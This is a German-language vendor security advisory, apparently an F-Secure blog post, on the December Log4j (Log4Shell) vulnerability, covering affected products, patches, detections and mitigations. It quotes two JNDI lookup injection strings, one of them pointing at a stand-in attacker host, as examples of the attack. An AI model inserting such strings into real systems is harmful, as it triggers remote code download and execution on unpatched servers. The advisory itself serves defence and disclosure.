Eine Sicherheitslücke in der Log4J library, die am Freitag, den 10. Dezember, entdeckt wurde, erschüttert Softwarehersteller und Dienstanbieter rund um den Globus. Die Schwachstelle in der standardisierten Methode zur Verarbeitung von Protokollnachrichten in Software von Microsofts Minecraft bis hin zu E-Commerce-Plattformen wird bereits von Angreifern attackiert.
Es ist fast unmöglich, das Ausmaß des Risikos zu beschreiben, das derzeit in anfälligen Anwendungen besteht. Wenn eine vom Benutzer kontrollierte Zeichenfolge, die auf die Schwachstelle abzielt, protokolliert wird, kann die Schwachstelle aus der Ferne ausgeführt werden. Vereinfacht ausgedrückt, kann ein Angreifer diese Schwachstelle nutzen, um das Zielsystem dazu zu bringen, Code von einem entfernten Standort abzurufen und auszuführen. Im zweiten Schritt bleibt es dem Angreifer überlassen, was der schadhafte Code anrichten soll.
Ein “fast perfekter Sturm“
Diese Sicherheitslücke zeigt, wie schwierig es ist, Unternehmenssoftware auf mehreren Ebenen zu sichern. Veraltete Software, einschließlich älterer Java-Versionen, zwingt viele Unternehmen dazu, ihre eigenen Patches zu entwickeln oder sie daran zu hindern, sie sofort zu patchen. Eine weitere Komplikation ergibt sich aus der Herausforderung, die Protokollierungsfunktionen von Log4j in Echtzeit zu patchen, gerade wenn die Bedrohung durch Angriffe so hoch und die Protokollierung so wichtig ist.
Alle empfohlenen Gegenmaßnahmen sollten “sofort” umgesetzt werden, schreibt die Cybersecurity & Infrastructure Security Agency in einem Blogbeitrag.
Einzelne Nutzer können nicht viel tun, außer Updates für verschiedene Online-Dienste zu installieren, sobald sie verfügbar sind. Und das sollte sofort geschehen. Firmen und Unternehmen werden ununterbrochen daran arbeiten, Patches bereitzustellen, während sie ihre eigenen Systeme absichern. Danach wird es wichtig sein festzustellen, ob ein aktiver Sicherheitsvorfall in den betroffenen Systemen im Gange ist.
Sicherheitslücken nahzu überall
Es kann schwieriger sein, eine Anwendung zu finden, die die Log4J Library nicht nutzt, als eine, die sie nutzt. Diese Omnipräsenz bedeutet, dass Angreifer fast überall nach Schwachstellen suchen können.
“Bitte ändern Sie den Namen Ihres Tesla oder iPhones nicht in ${jndi:ldap://url/a}, es sei denn, Sie wollen ein unerwartetes Ereignis”, sagt Erka Koivunen, Chief Information Security Officer bei F-Secure, scherzhaft.
Die Verwendung der Formatierungssprache von Log4J könnte Schadsoftware in anfälligen Anwendungen auslösen. Wie wir wissen, kann allein die Erwähnung eines Satzes wie ${jndi:ldap://attacker.com/pwnyourserver} beispielsweise in einem Minecraft-Chat in einem ungepatchten System einen Sicherheitssturm bei Microsoft auslösen.
Sind F-Secure-Produkte betroffen?
F-Secure hat festgestellt, dass die folgenden Produkte von dieser Sicherheitslücke betroffen sind:
- F-Secure Policy Manager
- F-Secure Policy Manager Proxy
- F-Secure Endpoint Proxy
- F-Secure Elements Connector
Sowohl Windows- als auch Linux-Versionen dieser Produkte sind betroffen und sollten sofort gepatcht werden.
Wie kann ich mein F-Secure-Produkt patchen?
Für diese Sicherheitslücke haben wir ein Sicherheits-Patch entwickelt. Aktuelles und Updates zu dieser Sicherheitslücke werden laufend in unserer Community Seite veröffentlicht
Welchen Schutz bietet F-Secure gegen diese Sicherheitslücke?
F-Secure Endpoint Protection (EPP) wird laufend mit Erkennungen für die neuesten lokalen Exploit-Dateien aktualisiert, aber angesichts der vielen Möglichkeiten, wie eine Sicherheitslücke ausgenutzt werden kann, deckt dies nur einen Teil des Problems ab.
EPP-Erkennungen befassen sich wie üblich mit jeder Nutzlast, die in der Phase nach der Ausnutzung gesehen wird. Zum jetzigen Zeitpunkt hat F-Secure die folgenden Erkennungen durchgeführt, die einige ernsthafte Angriffsszenarien abdecken. Dabei handelt es sich um bösartige Payloads, die wir in Verbindung mit Log4j-Exploits beobachtet haben.
- TR/Drop.Cobacis.AL
- TR/Rozena.wrdej
- TR/PShell.Agent.SWR
- TR/Coblat.G1
- TR/AD.MeterpreterSC.rywng
Viele dieser Erkennungen sind bereits seit Monaten in F-Secure EPP verfügbar, was bedeutet, dass die Kunden proaktiv vor diesen Payloads geschützt sind.
Andere vorhandene Erkennungen können ebenfalls hilfreich sein, da es mehrere Möglichkeiten gibt, den Exploit zu nutzen. Diese Liste mit nützlichen Erkennungen wird laufend aktualisiert, wenn sich die Situation weiterentwickelt. In den allgemeinen Empfehlungen im folgenden Abschnitt finden Sie weitere Abhilfemaßnahmen.
Welche Maßnahmen sollten Sie generell bei jeder Software ergreifen, unabhängig vom Hersteller?
- Schränken Sie den Netzwerkzugang ein oder beschränken Sie ihn auf vertrauenswürdige Sites. Wenn Ihr System keine Verbindung zum Internet herstellen kann, um den bösartigen Code abzurufen, wird der Angriff fehlschlagen.
- Erkundigen Sie sich regelmäßig bei den Anbietern, ob es Informationen über Patches und andere Abhilfemaßnahmen für Sicherheitslücken gibt.
- F-Secure Elements Vulnerability Management kann bei der Identifizierung anfälliger Systeme helfen.
- Die Produkte F-Secure Elements Endpoint Protection oder F-Secure Business Suite können die anfällige Software auf dem System, auf dem sie installiert sind, erkennen und patchen.
Kategorien